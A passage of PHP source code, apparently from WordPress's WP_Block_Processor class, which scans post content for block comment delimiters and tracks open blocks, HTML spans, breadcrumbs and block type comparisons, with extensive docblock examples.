* ╰─ Namespace starts here.
*
* <!-- wp:gallery -->
* ├─ The namespace would start here but is implied as “core.”
* ╰─ The name starts here.
*
* @since 6.9.0
*
* @var int
*/
private $namespace_at = 0;
/**
* Byte offset where block name span begins.
*
* When no namespace is present, this will be the same as the starting
* byte offset for the block namespace.
*
* Example:
*
* <!-- wp:core/gallery -->
* │ ╰─ Name starts here.
* ╰─ Namespace starts here.
*
* <!-- wp:gallery -->
* ├─ The namespace would start here but is implied as “core.”
* ╰─ The name starts here.
*
* @since 6.9.0
*
* @var int
*/
private $name_at = 0;
/**
* Byte length of block name span.
*
* Example:
*
* 5 10 15 20 25
* <!-- wp:core/gallery -->
* ╰─────╯
* 7 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $name_length = 0;
/**
* Whether the delimiter contains the block-closing flag.
*
* This may be erroneous if present within a void block,
* therefore the {@see self::has_closing_flag()} can be used by
* calling code to perform custom error-handling.
*
* @since 6.9.0
*
* @var bool
*/
private $has_closing_flag = false;
/**
* Byte offset where JSON attributes span begins.
*
* Example:
*
* 5 10 15 20 25 30 35 40
* <!-- wp:paragraph {"dropCaps":true} -->
* ╰─ Starts at byte offset 18.
*
* @since 6.9.0
*
* @var int
*/
private $json_at;
/**
* Byte length of JSON attributes span, or 0 if none are present.
*
* Example:
*
* 5 10 15 20 25 30 35 40
* <!-- wp:paragraph {"dropCaps":true} -->
* ╰───────────────╯
* 17 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $json_length = 0;
/**
* Internal parser state, differentiating whether the instance is currently matched,
* on an implicit freeform node, in error, or ready to begin parsing.
*
* @see self::READY
* @see self::MATCHED
* @see self::HTML_SPAN
* @see self::INCOMPLETE_INPUT
* @see self::COMPLETE
*
* @since 6.9.0
*
* @var string
*/
protected $state = self::READY;
/**
* Indicates what kind of block comment delimiter was matched.
*
* One of:
*
* - {@see self::OPENER} If the delimiter is opening a block.
* - {@see self::CLOSER} If the delimiter is closing an open block.
* - {@see self::VOID} If the delimiter represents a void block with no inner content.
*
* If a parsed comment delimiter contains both the closing and the void
* flags then it will be interpreted as a void block to match the behavior
* of the official block parser, however, this is a syntax error and probably
* the block ought to close an open block of the same name, if one is open.
*
* @since 6.9.0
*
* @var string
*/
private $type;
/**
* Whether the last-matched delimiter acts like a void block and should be
* popped from the stack of open blocks as soon as the parser advances.
*
* This applies to void block delimiters and to HTML spans.
*
* @since 6.9.0
*
* @var bool
*/
private $was_void = false;
/**
* For every open block, in hierarchical order, this stores the byte offset
* into the source text where the block type starts, including for HTML spans.
*
* To avoid allocating and normalizing block names when they aren’t requested,
* the stack of open blocks is stored as the byte offsets and byte lengths of
* each open block’s block type. This allows for minimal tracking and quick
* reading or comparison of block types when requested.
*
* @since 6.9.0
*
* @see self::$open_blocks_length
*
* @var int[]
*/
private $open_blocks_at = array();
/**
* For every open block, in hierarchical order, this stores the byte length
* of the block’s block type in the source text. For HTML spans this is 0.
*
* @since 6.9.0
*
* @see self::$open_blocks_at
*
* @var int[]
*/
private $open_blocks_length = array();
/**
* Indicates which operation should apply to the stack of open blocks after
* processing any pending spans of HTML.
*
* Since HTML spans are discovered after matching block delimiters, those
* delimiters need to defer modifying the stack of open blocks. This value,
* if set, indicates what operation should be applied. The properties
* associated with token boundaries still point to the delimiters even
* when processing HTML spans, so there’s no need to track them independently.
*
* @var 'push'|'void'|'pop'|null
*/
private $next_stack_op = null;
/**
* Creates a new block processor.
*
* Example:
*
* $processor = new WP_Block_Processor( $post_content );
* if ( $processor->next_block( 'core/image' ) ) {
* echo "Found an image!\n";
* }
*
* @see self::next_block() to advance to the start of the next block (skips closers).
* @see self::next_delimiter() to advance to the next explicit block delimiter.
* @see self::next_token() to advance to the next block delimiter or HTML span.
*
* @since 6.9.0
*
* @param string $source_text Input document potentially containing block content.
*/
public function __construct( string $source_text ) {
$this->source_text = $source_text;
}
/**
* Advance to the next block delimiter which opens a block, indicating if one was found.
*
* Delimiters which open blocks include opening and void block delimiters. To visit
* freeform HTML content, pass the wildcard “*” as the block type.
*
* Use this function to walk through the blocks in a document, pausing where they open.
*
* Example blocks:
*
* // The first delimiter opens the paragraph block.
* <⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨-⃨>⃨<p>Content</p><!-- /wp:paragraph-->
*
* // The void block is the first opener in this sequence of closers.
* <!-- /wp:group --><⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨s⃨p⃨a⃨c⃨e⃨r⃨ ⃨{⃨"⃨h⃨e⃨i⃨g⃨h⃨t⃨"⃨:⃨"⃨2⃨0⃨0⃨p⃨x⃨"⃨}⃨ ⃨/⃨-⃨-⃨>⃨<!-- /wp:group -->
*
* // If, however, `*` is provided as the block type, freeform content is matched.
* <⃨h⃨2⃨>⃨M⃨y⃨ ⃨s⃨y⃨n⃨o⃨p⃨s⃨i⃨s⃨<⃨/⃨h⃨2⃨>⃨\⃨n⃨<!-- wp:my/table-of-contents /-->
*
* // Inner HTML is never freeform content, and will not be matched even with the wildcard.
* <!-- /wp:list-item --></ul><!-- /wp:list --><⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨>⃨<p>
*
* Example:
*
* // Find all textual ranges of image block opening delimiters.
* $images = array();
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_block( 'core/image' ) ) {
* $images[] = $processor->get_span();
* }
*
* In some cases it may be useful to conditionally visit the implicit freeform
* blocks, such as when determining if a post contains freeform content that
* isn’t purely whitespace.
*
* Example:
*
* $seen_block_types = [];
* $block_type = '*';
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_block( $block_type ) {
* // Stop wasting time visiting freeform blocks after one has been found.
* if (
* '*' === $block_type &&
* null === $processor->get_block_type() &&
* $processor->is_non_whitespace_html()
* ) {
* $block_type = null;
* $seen_block_types['core/freeform'] = true;
* continue;
* }
*
* $seen_block_types[ $processor->get_block_type() ] = true;
* }
*
* @since 6.9.0
*
* @see self::next_delimiter() to advance to the next explicit block delimiter.
* @see self::next_token() to advance to the next block delimiter or HTML span.
*
* @param string|null $block_type Optional. If provided, advance until a block of this type is found.
* Default is to stop at any block regardless of its type.
* @return bool Whether an opening delimiter for a block was found.
*/
public function next_block( ?string $block_type = null ): bool {
while ( $this->next_delimiter( $block_type ) ) {
if ( self::CLOSER !== $this->get_delimiter_type() ) {
return true;
}
}
return false;
}
/**
* Advance to the next block delimiter in a document, indicating if one was found.
*
* Delimiters may include invalid JSON. This parser does not attempt to parse the
* JSON attributes until requested; when invalid, the attributes will be null. This
* matches the behavior of {@see \parse_blocks()}. To visit freeform HTML content,
* pass the wildcard “*” as the block type.
*
* Use this function to walk through the block delimiters in a document.
*
* Example delimiters:
*
* <!-- wp:paragraph {"dropCap": true} -->
* <!-- wp:separator /-->
* <!-- /wp:paragraph -->
*
* // If the wildcard `*` is provided as the block type, freeform content is matched.
* <⃨h⃨2⃨>⃨M⃨y⃨ ⃨s⃨y⃨n⃨o⃨p⃨s⃨i⃨s⃨<⃨/⃨h⃨2⃨>⃨\⃨n⃨<!-- wp:my/table-of-contents /-->
*
* // Inner HTML is never freeform content, and will not be matched even with the wildcard.
* ...</ul><⃨!⃨-⃨-⃨ ⃨/⃨w⃨p⃨:⃨l⃨i⃨s⃨t⃨ ⃨-⃨-⃨>⃨<!-- wp:paragraph --><p>
*
* Example:
*
* $html = '<!-- wp:void /-->\n<!-- wp:void /-->';
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter() {
* // Runs twice, seeing both void blocks of type “core/void.”
* }
*
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter( '*' ) ) {
* // Runs thrice, seeing the void block, the newline span, and the void block.
* }
*
* @since 6.9.0
*
* @param string|null $block_name Optional. Keep searching until a block of this name is found.
* Defaults to visit every block regardless of type.
* @return bool Whether a block delimiter was matched.
*/
public function next_delimiter( ?string $block_name = null ): bool {
if ( ! isset( $block_name ) ) {
while ( $this->next_token() ) {
if ( ! $this->is_html() ) {
return true;
}
}
return false;
}
while ( $this->next_token() ) {
if ( $this->is_block_type( $block_name ) ) {
return true;
}
}
return false;
}
/**
* Advance to the next block delimiter or HTML span in a document, indicating if one was found.
*
* This function steps through every syntactic chunk in a document. This includes explicit
* block comment delimiters, freeform non-block content, and inner HTML segments.
*
* Example tokens:
*
* <!-- wp:paragraph {"dropCap": true} -->
* <!-- wp:separator /-->
* <!-- /wp:paragraph -->
* <p>Normal HTML content</p>
* Plaintext content too!
*
* Example:
*
* // Find span containing wrapping HTML element surrounding inner blocks.
* $processor = new WP_Block_Processor( $html );
* if ( ! $processor->next_block( 'gallery' ) ) {
* return null;
* }
*
* $containing_span = null;
* while ( $processor->next_token() && $processor->is_html() ) {
* $containing_span = $processor->get_span();
* }
*
* This method will visit all HTML spans including those forming freeform non-block
* content as well as those which are part of a block’s inner HTML.
*
* @since 6.9.0
*
* @return bool Whether a token was matched or the end of the document was reached without finding any.
*/
public function next_token(): bool {
if ( $this->last_error || self::COMPLETE === $this->state || self::INCOMPLETE_INPUT === $this->state ) {
return false;
}
// Void tokens automatically pop off the stack of open blocks.
if ( $this->was_void ) {
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
$this->was_void = false;
}
$text = $this->source_text;
$end = strlen( $text );
/*
* Because HTML spans are inferred after finding the next delimiter, it means that
* the parser must transition out of that HTML state and reuse the token boundaries
* it found after the HTML span. If those boundaries are before the end of the
* document it implies that a real delimiter was found; otherwise this must be the
* terminating HTML span and the parsing is complete.
*/
if ( self::HTML_SPAN === $this->state ) {
if ( $this->matched_delimiter_at >= $end ) {
$this->state = self::COMPLETE;
return false;
}
switch ( $this->next_stack_op ) {
case 'void':
$this->was_void = true;
$this->open_blocks_at[] = $this->namespace_at;
$this->open_blocks_length[] = $this->name_at + $this->name_length - $this->namespace_at;
break;
case 'push':
$this->open_blocks_at[] = $this->namespace_at;
$this->open_blocks_length[] = $this->name_at + $this->name_length - $this->namespace_at;
break;
case 'pop':
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
break;
}
$this->next_stack_op = null;
$this->state = self::MATCHED;
return true;
}
$this->state = self::READY;
$after_prev_delimiter = $this->matched_delimiter_at + $this->matched_delimiter_length;
$at = $after_prev_delimiter;
while ( $at < $end ) {
/*
* Find the next possible start of a delimiter.
*
* This follows the behavior in the official block parser, which segments a post
* by the block comment delimiters. It is possible for an HTML attribute to contain
* what looks like a block comment delimiter but which is actually an HTML attribute
* value. In such a case, the parser here will break apart the HTML and create the
* block boundary inside the HTML attribute. In other words, the block parser
* isolates sections of HTML from each other, even if that leads to malformed markup.
*
* For a more robust parse, scan through the document with the HTML API and parse
* comments once they are matched to see if they are also block delimiters. In
* practice, this nuance has not caused any known problems since developing blocks.
*
* <⃨!⃨-⃨-⃨ /wp:core/paragraph {"dropCap":true} /-->
*/
$comment_opening_at = strpos( $text, '<!--', $at );
/*
* Even if the start of a potential block delimiter is not found, the document
* might end in a prefix of such, and in that case there is incomplete input.
*/
if ( false === $comment_opening_at ) {
if ( str_ends_with( $text, '<!-' ) ) {
$backup = 3;
} elseif ( str_ends_with( $text, '<!' ) ) {
$backup = 2;
} elseif ( str_ends_with( $text, '<' ) ) {
$backup = 1;
} else {
$backup = 0;
}
// Whether or not there is a potential delimiter, there might be an HTML span.
if ( $after_prev_delimiter < ( $end - $backup ) ) {
$this->state = self::HTML_SPAN;
$this->after_previous_delimiter = $after_prev_delimiter;
$this->matched_delimiter_at = $end - $backup;
$this->matched_delimiter_length = $backup;
$this->open_blocks_at[] = $after_prev_delimiter;
$this->open_blocks_length[] = 0;
$this->was_void = true;
return true;
}
/*
* In the case that there is the start of an HTML comment, it means that there
* might be a block delimiter, but it’s not possible know, therefore it’s incomplete.
*/
if ( $backup > 0 ) {
goto incomplete;
}
// Otherwise this is the end.
$this->state = self::COMPLETE;
return false;
}
// <!-- ⃨/wp:core/paragraph {"dropCap":true} /-->
$opening_whitespace_at = $comment_opening_at + 4;
if ( $opening_whitespace_at >= $end ) {
goto incomplete;
}
$opening_whitespace_length = strspn( $text, " \t\f\r\n", $opening_whitespace_at );
/*
* The `wp` prefix cannot come before this point, but it may come after it
* depending on the presence of the closer. This is detected next.
*/
$wp_prefix_at = $opening_whitespace_at + $opening_whitespace_length;
if ( $wp_prefix_at >= $end ) {
goto incomplete;
}
if ( 0 === $opening_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// <!-- /⃨wp:core/paragraph {"dropCap":true} /-->
$has_closer = false;
if ( '/' === $text[ $wp_prefix_at ] ) {
$has_closer = true;
++$wp_prefix_at;
}
// <!-- /w⃨p⃨:⃨core/paragraph {"dropCap":true} /-->
if ( $wp_prefix_at < $end && 0 !== substr_compare( $text, 'wp:', $wp_prefix_at, 3 ) ) {
if (
( $wp_prefix_at + 2 >= $end && str_ends_with( $text, 'wp' ) ) ||
( $wp_prefix_at + 1 >= $end && str_ends_with( $text, 'w' ) )
) {
goto incomplete;
}
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
/*
* If the block contains no namespace, this will end up masquerading with
* the block name. It’s easier to first detect the span and then determine
* if it’s a namespace of a name.
*
* <!-- /wp:c⃨o⃨r⃨e⃨/paragraph {"dropCap":true} /-->
*/
$namespace_at = $wp_prefix_at + 3;
if ( $namespace_at >= $end ) {
goto incomplete;
}
$start_of_namespace = $text[ $namespace_at ];
// The namespace must start with a-z.
if ( 'a' > $start_of_namespace || 'z' < $start_of_namespace ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
$namespace_length = 1 + strspn( $text, 'abcdefghijklmnopqrstuvwxyz0123456789-_', $namespace_at + 1 );
$separator_at = $namespace_at + $namespace_length;
if ( $separator_at >= $end ) {
goto incomplete;
}
// <!-- /wp:core/⃨paragraph {"dropCap":true} /-->
$has_separator = '/' === $text[ $separator_at ];
if ( $has_separator ) {
$name_at = $separator_at + 1;
if ( $name_at >= $end ) {
goto incomplete;
}
// <!-- /wp:core/p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ {"dropCap":true} /-->
$start_of_name = $text[ $name_at ];
if ( 'a' > $start_of_name || 'z' < $start_of_name ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
$name_length = 1 + strspn( $text, 'abcdefghijklmnopqrstuvwxyz0123456789-_', $name_at + 1 );
} else {
$name_at = $namespace_at;
$name_length = $namespace_length;
}
if ( $name_at + $name_length >= $end ) {
goto incomplete;
}
/*
* For this next section of the delimiter, it could be the JSON attributes
* or it could be the end of the comment. Assume that the JSON is there and
* update if it’s not.
*/
// <!-- /wp:core/paragraph ⃨{"dropCap":true} /-->
$after_name_whitespace_at = $name_at + $name_length;
$after_name_whitespace_length = strspn( $text, " \t\f\r\n", $after_name_whitespace_at );
$json_at = $after_name_whitespace_at + $after_name_whitespace_length;
if ( $json_at >= $end ) {
goto incomplete;
}
if ( 0 === $after_name_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// <!-- /wp:core/paragraph {⃨"dropCap":true} /-->
$has_json = '{' === $text[ $json_at ];
$json_length = 0;
/*
* For the final span of the delimiter it's most efficient to find the end of the
* HTML comment and work backwards. This prevents complicated parsing inside the
* JSON span, which is not allowed to contain the HTML comment terminator.
*
* This also matches the behavior in the official block parser,
* even though it allows for matching invalid JSON content.
*
* <!-- /wp:core/paragraph {"dropCap":true} /-⃨-⃨>⃨
*/
$comment_closing_at = strpos( $text, '-->', $json_at );
if ( false === $comment_closing_at ) {
goto incomplete;
}
// <!-- /wp:core/paragraph {"dropCap":true} /⃨-->
if ( '/' === $text[ $comment_closing_at - 1 ] ) {
$has_void_flag = true;
$void_flag_length = 1;
} else {
$has_void_flag = false;
$void_flag_length = 0;
}
/*
* If there's no JSON, then the span of text after the name
* until the comment closing must be completely whitespace.
* Otherwise it’s a normal HTML comment.
*/
if ( ! $has_json ) {
if ( $after_name_whitespace_at + $after_name_whitespace_length === $comment_closing_at - $void_flag_length ) {
// This must be a block delimiter!
$this->state = self::MATCHED;
break;
}
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
/*
* There's JSON, so attempt to find its boundary.
*
* @todo It’s likely faster to scan forward instead of in reverse.
*
* <!-- /wp:core/paragraph {"dropCap":true}⃨ ⃨/-->
*/
$after_json_whitespace_length = 0;
for ( $char_at = $comment_closing_at - $void_flag_length - 1; $char_at > $json_at; $char_at-- ) {
$char = $text[ $char_at ];
switch ( $char ) {
case ' ':
case "\t":
case "\f":
case "\r":
case "\n":
++$after_json_whitespace_length;
continue 2;
case '}':
$json_length = $char_at - $json_at + 1;
break 2;
default:
++$at;
continue 3;
}
}
/*
* This covers cases where there is no terminating “}” or where
* mandatory whitespace is missing.
*/
if ( 0 === $json_length || 0 === $after_json_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// This must be a block delimiter!
$this->state = self::MATCHED;
break;
}
// The end of the document was reached without a match.
if ( self::MATCHED !== $this->state ) {
$this->state = self::COMPLETE;
return false;
}
/*
* From this point forward, a delimiter has been matched. There
* might also be an HTML span that appears before the delimiter.
*/
$this->after_previous_delimiter = $after_prev_delimiter;
$this->matched_delimiter_at = $comment_opening_at;
$this->matched_delimiter_length = $comment_closing_at + 3 - $comment_opening_at;
$this->namespace_at = $namespace_at;
$this->name_at = $name_at;
$this->name_length = $name_length;
$this->json_at = $json_at;
$this->json_length = $json_length;
/*
* When delimiters contain both the void flag and the closing flag
* they shall be interpreted as void blocks, per the spec parser.
*/
if ( $has_void_flag ) {
$this->type = self::VOID;
$this->next_stack_op = 'void';
} elseif ( $has_closer ) {
$this->type = self::CLOSER;
$this->next_stack_op = 'pop';
/*
* @todo Check if the name matches and bail according to the spec parser.
* The default parser doesn’t examine the names.
*/
} else {
$this->type = self::OPENER;
$this->next_stack_op = 'push';
}
$this->has_closing_flag = $has_closer;
// HTML spans are visited before the delimiter that follows them.
if ( $comment_opening_at > $after_prev_delimiter ) {
$this->state = self::HTML_SPAN;
$this->open_blocks_at[] = $after_prev_delimiter;
$this->open_blocks_length[] = 0;
$this->was_void = true;
return true;
}
// If there were no HTML spans then flush the enqueued stack operations immediately.
switch ( $this->next_stack_op ) {
case 'void':
$this->was_void = true;
$this->open_blocks_at[] = $namespace_at;
$this->open_blocks_length[] = $name_at + $name_length - $namespace_at;
break;
case 'push':
$this->open_blocks_at[] = $namespace_at;
$this->open_blocks_length[] = $name_at + $name_length - $namespace_at;
break;
case 'pop':
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
break;
}
$this->next_stack_op = null;
return true;
incomplete:
$this->state = self::COMPLETE;
$this->last_error = self::INCOMPLETE_INPUT;
return false;
}
/**
* Returns an array containing the names of the currently-open blocks, in order
* from outermost to innermost, with HTML spans indicated as “#html”.
*
* Example:
*
* // Freeform HTML content is an HTML span.
* $processor = new WP_Block_Processor( 'Just text' );
* $processor->next_token();
* array( '#text' ) === $processor->get_breadcrumbs();
*
* $processor = new WP_Block_Processor( '<!-- wp:a --><!-- wp:b --><!-- wp:c /--><!-- /wp:b --><!-- /wp:a -->' );
* $processor->next_token();
* array( 'core/a' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* array( 'core/a', 'core/b' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* // Void blocks are only open while visiting them.
* array( 'core/a', 'core/b', 'core/c' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* // Blocks are closed before visiting their closing delimiter.
* array( 'core/a' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* array() === $processor->get_breadcrumbs();
*
* // Inner HTML is also an HTML span.
* $processor = new WP_Block_Processor( '<!-- wp:a -->Inner HTML<!-- /wp:a -->' );
* $processor->next_token();
* $processor->next_token();
* array( 'core/a', '#html' ) === $processor->get_breadcrumbs();
*
* @since 6.9.0
*
* @return string[]
*/
public function get_breadcrumbs(): array {
$breadcrumbs = array_fill( 0, count( $this->open_blocks_at ), null );
/*
* Since HTML spans can only be at the very end, set the normalized block name for
* each open element and then work backwards after creating the array. This allows
* for the elimination of a conditional on each iteration of the loop.
*/
foreach ( $this->open_blocks_at as $i => $at ) {
$block_type = substr( $this->source_text, $at, $this->open_blocks_length[ $i ] );
$breadcrumbs[ $i ] = self::normalize_block_type( $block_type );
}
if ( isset( $i ) && 0 === $this->open_blocks_length[ $i ] ) {
$breadcrumbs[ $i ] = '#html';
}
return $breadcrumbs;
}
/**
* Returns the depth of the open blocks where the processor is currently matched.
*
* Depth increases before visiting openers and void blocks and decreases before
* visiting closers. HTML spans behave like void blocks.
*
* @since 6.9.0
*
* @return int
*/
public function get_depth(): int {
return count( $this->open_blocks_at );
}
/**
* Extracts a block object, and all inner content, starting at a matched opening
* block delimiter, or at a matched top-level HTML span as freeform HTML content.
*
* Use this function to extract some blocks within a document, but not all. For example,
* one might want to find image galleries, parse them, modify them, and then reserialize
* them in place.
*
* Once this function returns, the parser will be matched on token following the close
* of the given block.
*
* The return type of this method is compatible with the return of {@see \parse_blocks()}.
*
* Example:
*
* $processor = new WP_Block_Processor( $post_content );
* if ( ! $processor->next_block( 'gallery' ) ) {
* return $post_content;
* }
*
* $gallery_at = $processor->get_span()->start;
* $gallery = $processor->extract_full_block_and_advance();
* $ends_before = $processor->get_span();
* $ends_before = $ends_before->start ?? strlen( $post_content );
*
* $new_gallery = update_gallery( $gallery );
* $new_gallery = serialize_block( $new_gallery );
*
* return (
* substr( $post_content, 0, $gallery_at ) .
* $new_gallery .
* substr( $post_content, $ends_before )
* );
*
* @since 6.9.0
*
* @return array[]|null {
* Array of block structures.
*
* @type array ...$0 {
* An associative array of a single parsed block object. See WP_Block_Parser_Block.
*
* @type string|null $blockName Name of block.
* @type array $attrs Attributes from block comment delimiters.
* @type array[] $innerBlocks List of inner blocks. An array of arrays that
* have the same structure as this one.
* @type string $innerHTML HTML from inside block comment delimiters.
* @type array $innerContent List of string fragments and null markers where
* inner blocks were found.
* }
* }
*/
public function extract_full_block_and_advance(): ?array {
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
return array(
'blockName' => null,
'attrs' => array(),
'innerBlocks' => array(),
'innerHTML' => $chunk,
'innerContent' => array( $chunk ),
);
}
$block = array(
'blockName' => $this->get_block_type(),
'attrs' => $this->allocate_and_return_parsed_attributes() ?? array(),
'innerBlocks' => array(),
'innerHTML' => '',
'innerContent' => array(),
);
$depth = $this->get_depth();
while ( $this->next_token() && $this->get_depth() > $depth ) {
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
$block['innerHTML'] .= $chunk;
$block['innerContent'][] = $chunk;
continue;
}
/**
* Inner blocks.
*
* @todo This is a decent place to call {@link \render_block()}
* @todo Use iteration instead of recursion, or at least refactor to tail-call form.
*/
if ( $this->opens_block() ) {
$inner_block = $this->extract_full_block_and_advance();
$block['innerBlocks'][] = $inner_block;
$block['innerContent'][] = null;
}
/*
* Because the parser has advanced past the closing block token, it
* may be matched on an HTML span. This needs to be processed before
* moving on to the next token at the start of the next loop iteration.
*/
if ( $this->is_html() ) {
$chunk = $this->get_html_content();
$block['innerHTML'] .= $chunk;
$block['innerContent'][] = $chunk;
}
}
return $block;
}
/**
* Returns the byte-offset after the ending character of an HTML comment,
* assuming the proper starting byte offset.
*
* @since 6.9.0
*
* @param int $comment_starting_at Where the HTML comment started, the leading `<`.
* @param int $search_end Last offset in which to search, for limiting search span.
* @return int Offset after the current HTML comment ends, or `$search_end` if no end was found.
*/
private function find_html_comment_end( int $comment_starting_at, int $search_end ): int {
$text = $this->source_text;
// Find span-of-dashes comments which look like `<!----->`.
$span_of_dashes = strspn( $text, '-', $comment_starting_at + 2 );
if (
$comment_starting_at + 2 + $span_of_dashes < $search_end &&
'>' === $text[ $comment_starting_at + 2 + $span_of_dashes ]
) {
return $comment_starting_at + $span_of_dashes + 1;
}
// Otherwise, there are other characters inside the comment, find the first `-->` or `--!>`.
$now_at = $comment_starting_at + 4;
while ( $now_at < $search_end ) {
$dashes_at = strpos( $text, '--', $now_at );
if ( false === $dashes_at ) {
return $search_end;
}
$closer_must_be_at = $dashes_at + 2 + strspn( $text, '-', $dashes_at + 2 );
if ( $closer_must_be_at < $search_end && '!' === $text[ $closer_must_be_at ] ) {
++$closer_must_be_at;
}
if ( $closer_must_be_at < $search_end && '>' === $text[ $closer_must_be_at ] ) {
return $closer_must_be_at + 1;
}
++$now_at;
}
return $search_end;
}
/**
* Indicates if the last attempt to parse a block comment delimiter
* failed, if set, otherwise `null` if the last attempt succeeded.
*
* @since 6.9.0
*
* @return string|null Error from last attempt at parsing next block delimiter,
* or `null` if last attempt succeeded.
*/
public function get_last_error(): ?string {
return $this->last_error;
}
/**
* Indicates if the last attempt to parse a block’s JSON attributes failed.
*
* @see \json_last_error()
*
* @since 6.9.0
*
* @return int JSON_ERROR_ code from last attempt to parse block JSON attributes.
*/
public function get_last_json_error(): int {
return $this->last_json_error;
}
/**
* Returns the type of the block comment delimiter.
*
* One of:
*
* - {@see self::OPENER}
* - {@see self::CLOSER}
* - {@see self::VOID}
* - `null`
*
* @since 6.9.0
*
* @return string|null type of the block comment delimiter, if currently matched.
*/
public function get_delimiter_type(): ?string {
switch ( $this->state ) {
case self::HTML_SPAN:
return self::VOID;
case self::MATCHED:
return $this->type;
default:
return null;
}
}
/**
* Returns whether the delimiter contains the closing flag.
*
* This should be avoided except in cases of custom error-handling
* with block closers containing the void flag. For normative use,
* {@see self::get_delimiter_type()}.
*
* @since 6.9.0
*
* @return bool Whether the currently-matched block delimiter contains the closing flag.
*/
public function has_closing_flag(): bool {
return $this->has_closing_flag;
}
/**
* Indicates if the block delimiter represents a block of the given type.
*
* Since the “core” namespace may be implicit, it’s allowable to pass
* either the fully-qualified block type with namespace and block name
* as well as the shorthand version only containing the block name, if
* the desired block is in the “core” namespace.
*
* Since freeform HTML content is non-block content, it has no block type.
* Passing the wildcard “*” will, however, return true for all block types,
* even the implicit freeform content, though not for spans of inner HTML.
*
* Example:
*
* $is_core_paragraph = $processor->is_block_type( 'paragraph' );
* $is_core_paragraph = $processor->is_block_type( 'core/paragraph' );
* $is_formula = $processor->is_block_type( 'math-block/formula' );
*
* @param string $block_type Block type name for the desired block.
* E.g. "paragraph", "core/paragraph", "math-blocks/formula".
* @return bool Whether this delimiter represents a block of the given type.
*/
public function is_block_type( string $block_type ): bool {
if ( '*' === $block_type ) {
return true;
}
if ( $this->is_html() ) {
// This is a core/freeform text block, it’s special.
if ( 0 === ( $this->open_blocks_length[0] ?? null ) ) {
return (
'core/freeform' === $block_type ||
'freeform' === $block_type
);
}
// Otherwise this is innerHTML and not a block.
return false;
}
return $this->are_equal_block_types( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length, $block_type, 0, strlen( $block_type ) );
}
/**
* Given two spans of text, indicate if they represent identical block types.
*
* This function normalizes block types to account for implicit core namespacing.
*
* Note! This function only returns valid results when the complete block types are
* represented in the span offsets and lengths. This means that the full optional
* namespace and block name must be represented in the input arguments.
*
* Example:
*
* 0 5 10 15 20 25 30 35 40
* $text = '<!-- wp:block --><!-- /wp:core/block -->';
*
* true === WP_Block_Processor::are_equal_block_types( $text, 9, 5, $text, 27, 10 );
* false === WP_Block_Processor::are_equal_block_types( $text, 9, 5, 'my/block', 0, 8 );
*
* @since 6.9.0
*
* @param string $a_text Text in which first block type appears.
* @param int $a_at Byte offset into text in which first block type starts.
* @param int $a_length Byte length of first block type.
* @param string $b_text Text in which second block type appears (may be the same as the first text).
* @param int $b_at Byte offset into text in which second block type starts.
* @param int $b_length Byte length of second block type.
* @return bool Whether the spans of text represent identical block types, normalized for namespacing.
*/
public static function are_equal_block_types( string $a_text, int $a_at, int $a_length, string $b_text, int $b_at, int $b_length ): bool {
$a_ns_length = strcspn( $a_text, '/', $a_at, $a_length );
$b_ns_length = strcspn( $b_text, '/', $b_at, $b_length );
$a_has_ns = $a_ns_length !== $a_length;
$b_has_ns = $b_ns_length !== $b_length;
// Both contain namespaces.
if ( $a_has_ns && $b_has_ns ) {
if ( $a_length !== $b_length ) {
return false;
}
$a_block_type = substr( $a_text, $a_at, $a_length );
return 0 === substr_compare( $b_text, $a_block_type, $b_at, $b_length );
}
if ( $a_has_ns ) {
$b_block_type = 'core/' . substr( $b_text, $b_at, $b_length );
return (
strlen( $b_block_type ) === $a_length &&
0 === substr_compare( $a_text, $b_block_type, $a_at, $a_length )
);
}
if ( $b_has_ns ) {
$a_block_type = 'core/' . substr( $a_text, $a_at, $a_length );
return (
strlen( $a_block_type ) === $b_length &&
0 === substr_compare( $b_text, $a_block_type, $b_at, $b_length )
);
}
// Neither contains a namespace.
if ( $a_length !== $b_length ) {
return false;
}
$a_name = substr( $a_text, $a_at, $a_length );
return 0 === substr_compare( $b_text, $a_name, $b_at, $b_length );
}
/**
* Indicates if the matched delimiter is an opening or void delimiter of the given type,
* if a type is provided, otherwise if it opens any block or implicit freeform HTML content.
*
* This is a helper method to ease handling of code inspecting where blocks start, and for
* checking if the blocks are of a given type. The function is variadic to allow for
* checking if the delimiter opens one of many possible block types.
*
* To advance to the start of a block {@see self::next_block()}.
*
* Example:
*
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter() ) {
* if ( $processor->opens_block( 'core/code', 'syntaxhighlighter/code' ) ) {
* echo "Found code!";
* continue;
* }
*
* if ( $processor->opens_block( 'core/image' ) ) {
* echo "Found an image!";
* continue;
* }
*
* if ( $processor->opens_block() ) {
* echo "Found a new block!";
* }
* }
*
